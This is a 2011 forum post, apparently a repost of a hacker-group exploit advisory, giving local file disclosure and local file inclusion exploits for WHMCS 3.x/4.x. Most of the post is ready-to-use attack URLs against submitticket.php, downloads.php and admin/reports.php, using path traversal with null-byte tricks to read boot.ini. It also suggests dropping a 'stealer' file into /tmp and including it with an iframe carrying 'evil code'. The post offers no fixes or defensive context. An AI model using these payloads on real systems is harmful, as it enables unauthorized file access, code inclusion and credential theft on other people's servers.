Nytro Posted November 7, 2011 Report Posted November 7, 2011 WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities$b0x# WHMCS ( WHMCompleteSolution ) 3.x / 4.x Multiple Vulnerability !$b0x# ZxH-Labs$b0x# 1st-NOV-11$b0x# Www.Sec4ever.coM$b0x# WH-03 On Windows IIS 6.0========================================================b0x@1337b0x:/b0x/Exploits/WebAPP# whoamiZxH-Labs | Www.Sec4ever.coMb0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPLEXPL Type : Local File DisclosureFiles : Submitticket.php , Downloads.php -> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00 EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00 ->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00 EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00b0x@1337b0x:/b0x/Exploits/WebAPP#b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.bugBug TYPE : Local File IncludeBug File : Reports.php -I : reports.php?report=[LFI]%00 EX : admin/reports.php?report=../../../../../../../boot.ini%00 You Can Use This Bug When You Get Forbidden Access In Lux Symlink ! However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be -FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00 And Don't Forget To Use IFRAME With Evil Code'z b0x@1337b0x:/b0x/Exploits/WebAPP# Logout========================================================$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever | TNT_HACKER | r1z | Tw1st3r | S4SCyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN | Th3MMA | FreeMan(LY) | Ma3stro_DZMr.L4iv3 And All Q8'z./b0xSursa: WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities Quote
